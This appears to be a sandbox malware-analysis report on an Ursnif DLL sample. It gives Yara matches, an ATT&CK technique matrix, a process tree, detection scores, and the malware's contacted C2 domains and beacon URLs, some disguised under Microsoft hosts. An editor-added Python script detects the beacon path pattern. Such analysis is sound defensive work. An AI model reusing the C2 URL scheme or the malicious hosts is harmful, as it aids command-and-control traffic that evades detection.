Source: Yara match | File source: 00000003.00000003.567583094.00000000049BD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.776401255.0000000004840000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.521826421.0000000004ABB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484353267.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477363484.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477795801.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484300889.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477552233.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.576475056.000000000331D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.483984504.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484055425.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477498453.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484848144.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477873003.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.774526618.00000000031A0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.612038120.00000000048BF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 4668, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4712, type: MEMORYSTR
Source: Yara match | File source: 3.3.rundll32.exe.70a31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.caa31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.30794a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.70a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.30794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.45794a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.45794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.rundll32.exe.33ba31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.rundll32.exe.33ba31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.30da31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.caa31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.rundll32.exe.6e4c0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.c70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.30da31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.64a31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.64a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.391175894.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.432941083.0000000000CA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.774318149.0000000003079000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.421383177.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.776217854.0000000004579000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.389669380.0000000000700000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484405458.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484224135.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.483910009.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477283953.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484141352.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477436654.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.478270609.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.619486334.000000000321F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.528112034.000000000341B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.567583094.00000000049BD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.776401255.0000000004840000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.521826421.0000000004ABB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484353267.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477363484.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477795801.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484300889.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477552233.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.576475056.000000000331D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.483984504.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484055425.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477498453.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484848144.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477873003.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.774526618.00000000031A0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.612038120.00000000048BF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 4668, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4712, type: MEMORYSTR
Source: Yara match | File source: 3.3.rundll32.exe.70a31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.caa31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.30794a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.70a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.30794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.45794a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.45794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.rundll32.exe.33ba31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.rundll32.exe.33ba31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.30da31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.caa31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.rundll32.exe.6e4c0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.c70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.30da31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.64a31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.64a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.391175894.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.432941083.0000000000CA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.774318149.0000000003079000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.421383177.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.776217854.0000000004579000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.389669380.0000000000700000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Digits following a technique name are the report's signature-count badges, reproduced as extracted.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation2 | Path Interception | Process Injection112 | Virtualization/Sandbox Evasion1 | Input Capture1 | System Time Discovery2 | Remote Services | Input Capture1 | Exfiltration Over Other Network Medium | Encrypted Channel11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection112 | LSASS Memory | Security Software Discovery21 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Virtualization/Sandbox Evasion1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information2 | NTDS | Process Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol14 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll321 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

                      Behavior Graph

Behavior Graph ID: 500309; Sample: 6yDD19jMIu.dll; Start date: 11/10/2021; Architecture: WINDOWS; Score: 96

Sample-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Ursnif

loaddll32.exe (started from the sample; graph badge 1)
DNS/IP: breuranel.website; areuranel.website; 11 other IPs or domains
Signatures: Writes or reads registry keys via WMI; Writes registry values via WMI
Child processes: rundll32.exe; cmd.exe (badge 1); rundll32.exe; rundll32.exe

rundll32.exe (first child of loaddll32.exe)
Signatures: System process connects to network (likely due to code injection or exploit); Writes registry values via WMI
Child process: WerFault.exe (badges 23, 9)

cmd.exe (child of loaddll32.exe)
Child process: rundll32.exe

rundll32.exe (two further children of loaddll32.exe)
Each starts a WerFault.exe (badges 9 and 2, 9 respectively)

rundll32.exe (child of cmd.exe)
DNS/IP: 52.97.137.114, port 443 (source port 49844), MICROSOFT-CORP-MSN-AS-BLOCKUS, United States; 52.97.219.162, port 443 (source ports 49843, 49846), MICROSOFT-CORP-MSN-AS-BLOCKUS, United States; 12 other IPs or domains
Signature: System process connects to network (likely due to code injection or exploit)

The badge figures are the per-process counts drawn in the graph (created registry values and created files, per the graph legend); they are reproduced as extracted.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
6yDD19jMIu.dll | 9% | Virustotal |
6yDD19jMIu.dll | 5% | ReversingLabs |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.loaddll32.exe.c70000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
3.2.rundll32.exe.810000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

Domains

Source | Detection | Scanner | Label
areuranel.website | 7% | Virustotal |
breuranel.website | 7% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://breuranel.website/liopolo/Gu5CX9rKtqJTGdubC/vfDJzFOCWocD/fyvnSBIy2J4/FhQlzlOfNqSLAT/n_2BCGU5 | 0% | Avira URL Cloud | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
https://breuranel.website/8 | 0% | Avira URL Cloud | safe
https://breuranel.website/X | 0% | Avira URL Cloud | safe
https://areuranel.website/ | 7% | Virustotal |
https://areuranel.website/ | 0% | Avira URL Cloud | safe
https://breuranel.website/liopolo/VQCuXOMQ58gaep/wQcyE3XNRkOUslXiuIoRn/thqxftgA7_2FvfGU/paR5aKKlYUJw | 0% | Avira URL Cloud | safe
https://areuranel.website/liopolo/gPZADesC/LIHFYPg1nfeS6qR4dfr58Og/poTvfxxfV9/7jcxdAxrxlBGvHHC2/KE8j | 0% | Avira URL Cloud | safe
https://mem.gfx.ms/meversion/?partner=msn&market=en-us" | 0% | Avira URL Cloud | safe
https://breuranel.website/liopolo/oPGaMFzTwbyZJ3jE/9_2B3jdhd0kGHjG/n_2BHWHpJci47et543/_2B6aHUxi/oZM9 | 0% | Avira URL Cloud | safe

Note that the URL scanners rate every areuranel.website and breuranel.website URL as "safe" or 0%; the malicious verdict for these two hosts comes from the behavioural and Yara evidence above, not from URL reputation.

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
msn.com | 13.82.28.61 | true | false | | high
outlook.com | 40.97.161.50 | true | false | | high
HHN-efz.ms-acdc.office.com | 52.97.223.66 | true | false | | high
FRA-efz.ms-acdc.office.com | 40.101.124.210 | true | false | | high
www.msn.com | unknown | unknown | false | | high
www.outlook.com | unknown | unknown | false | | high
areuranel.website | unknown | unknown | true | | unknown
breuranel.website | unknown | unknown | true | | unknown
outlook.office365.com | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://outlook.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre | false | | high
https://www.outlook.com/signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre | false | | high
https://outlook.office365.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre | false | | high
https://outlook.office365.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre | false | | high
https://msn.com/mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtdN4v/UdHW73hHNRRgj93MpeR/gAwjHz21J0PRcDvLd3I609/yvRpibRLzjrjt/tNfBhMKC/cc7JRbI6tVdqBgZvAlBLjz4/UmIafwR6sLy9/c9juhd.jre | false | | high
https://outlook.com/signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre | false | | high
https://www.outlook.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre | false | | high
https://outlook.office365.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre | false | | high
https://msn.com/mail/liopolo/ytBZeomNqV/HSfS_2F75u1_2Bgzu/fw3T9nUGqtyA/MnMc49Ew1bU/TR75BNg3t5wK_2/FZ_2BhHpRHjaoiOWsJCdm/IP7BzqL3kfOIwEpd/0v6vAk1XTaQKS4Q/4t76RFSHOBJGuOI3un/dPzfZGf9x/VMluKaNPNp_2BEHsWys0/7w8R7Qn2JCyyYRXwFiA/UZytNi_2F_2BVoKUDorTiy/Fo.jre | false | | high
https://www.outlook.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre | false | | high
https://msn.com/mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/MnijqTPatYoqwLU2Gjp/CUGc0n_2BeItdu5kr8poMa/AhSBnyUxBLy2z/WL6kh9Er/V_2FntCaBAYN2Q0pmQz73pS/plPX31iyVH/sliN48qRh7bzwYOXL/_2Bf1goPp5sf/LxXLhBSZnu3/MQi2YcecwkM/9zZah40u0/3pu.jre | false | | high
https://outlook.office365.com/signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre | false | | high
https://outlook.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre | false | | high
https://www.outlook.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre | false | | high
https://outlook.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre | false | | high

Every contacted URL in this table goes to a legitimate Microsoft host (outlook.com, www.outlook.com, outlook.office365.com, msn.com), yet all of them carry the same path shape as the requests to areuranel.website and breuranel.website in the tables above: a fixed marker segment (liopolo), a long run of slash-separated alphanumeric chunks containing _2B and _2F tokens, and a .jre extension. For detection, that path shape is a far better pivot than the host name, which the report rates high-reputation.
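The following triage script is an added example by the editor, not part of the Joe Sandbox report and not code from the sample. It scores the URLs listed in this report by path shape rather than by host: a marker segment (liopolo, taken from the report's own URLs), the number of path chunks after it, the presence of _2B / _2F tokens, an alphanumeric-plus-underscore character set and a .jre suffix. The reading of _2B and _2F as percent-escapes for + and / with % swapped for _ is the editor's assumption, as are the score weights and the flag threshold; the report states neither. One detail the report's data shows and the script accounts for: the tokens can be split across a slash (for example "jyyD8scRCvd_/2FyMxtVOaJ3"), so the chunks must be joined before counting them. The URL list is a constructed subset copied from the tables above.

```python
"""Path-shape triage for the URLs in this report (added example, not report code)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed subset of the report's "Contacted URLs" and "URLs" tables.
REPORT_URLS = [
    "https://outlook.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre",
    "https://msn.com/mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtdN4v/UdHW73hHNRRgj93MpeR/gAwjHz21J0PRcDvLd3I609/yvRpibRLzjrjt/tNfBhMKC/cc7JRbI6tVdqBgZvAlBLjz4/UmIafwR6sLy9/c9juhd.jre",
    "https://outlook.office365.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre",
    "https://areuranel.website/liopolo/gPZADesC/LIHFYPg1nfeS6qR4dfr58Og/poTvfxxfV9/7jcxdAxrxlBGvHHC2/KE8j",
    "https://breuranel.website/liopolo/oPGaMFzTwbyZJ3jE/9_2B3jdhd0kGHjG/n_2BHWHpJci47et543/_2B6aHUxi/oZM9",
    "https://deff.nelreports.net/api/report?cat=msn",
    "https://www.msn.com/en-us//api/modules/fetch",
]
# Hosts the report itself marks Malicious=true in "Contacted Domains".
REPORT_MALICIOUS_HOSTS = {"areuranel.website", "breuranel.website"}

# Assumption: "_2B" / "_2F" are percent-escapes for "+" and "/" with "%" replaced by "_".
TOKEN_RE = re.compile(r"_2[BF]")
BLOB_CHARSET = re.compile(r"[A-Za-z0-9_]+")
FLAG_THRESHOLD = 4  # arbitrary editor's choice, see score() below


def analyze_url(url: str, marker: str = "liopolo") -> dict:
    """Return the path-shape features of one URL plus a score and flag."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    segs = [s for s in parts.path.split("/") if s]  # drop empties from "//"
    has_marker = marker in segs
    tail = segs[segs.index(marker) + 1:] if has_marker else []

    ext = ""
    if tail and "." in tail[-1]:  # e.g. "ZX0Xxi4W.jre" -> stem + extension
        stem, ext = tail[-1].rsplit(".", 1)
        tail = tail[:-1] + [stem]

    joined = "".join(tail)
    # Count tokens on the joined blob (tokens may straddle a "/") and per chunk.
    tokens_joined = len(TOKEN_RE.findall(joined))
    tokens_split = sum(len(TOKEN_RE.findall(s)) for s in tail)
    charset_ok = bool(joined) and BLOB_CHARSET.fullmatch(joined) is not None

    score = 0
    score += 2 if has_marker else 0       # campaign marker segment
    score += 1 if len(tail) >= 3 else 0    # long slash-split run
    score += 1 if tokens_joined else 0     # _2B/_2F escapes present
    score += 1 if charset_ok else 0        # base64-like alphabet only
    score += 1 if ext == "jre" else 0      # extension seen in the report

    return {
        "url": url,
        "host": host,
        "has_marker": has_marker,
        "chunks": len(tail),
        "tokens_joined": tokens_joined,
        "tokens_split": tokens_split,
        "charset_ok": charset_ok,
        "ext": ext,
        "score": score,
        "flagged": score >= FLAG_THRESHOLD,
        "host_flagged_by_report": host in REPORT_MALICIOUS_HOSTS,
    }


def triage(urls, marker: str = "liopolo") -> list:
    """Analyze every URL; the caller decides what to do with the flags."""
    return [analyze_url(u, marker) for u in urls]


def hosts_by_verdict(rows) -> dict:
    """Group flagged hosts by whether the report's host verdict agrees."""
    groups = defaultdict(set)
    for r in rows:
        if r["flagged"]:
            key = "report_malicious" if r["host_flagged_by_report"] else "report_benign_host"
            groups[key].add(r["host"])
    return dict(groups)


if __name__ == "__main__":
    rows = triage(REPORT_URLS)
    for r in rows:
        print(f"{r['score']:>2} {'FLAG' if r['flagged'] else '    '} "
              f"{r['host']:<24} chunks={r['chunks']:<2} tokens={r['tokens_joined']}")
    print(hosts_by_verdict(rows))
```

Run against the report's own URLs, the path-shape score flags the two .website hosts and the four Microsoft hosts alike, while the two unrelated telemetry URLs (deff.nelreports.net, the msn.com API call) score zero. That is the practical point: a host-reputation filter passes the outlook.com and msn.com requests, a path-shape rule catches all of them. The gap between tokens_joined and tokens_split on the outlook.office365.com URL is why the chunks are joined first.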

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://outlook.office365.com | loaddll32.exe, 00000000.00000002.769550335.0000000001102000.00000004.00000001.sdmp | false | | high
https://www.outlook.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS | loaddll32.exe, 00000000.00000002.769550335.0000000001102000.00000004.00000001.sdmp | false | | high
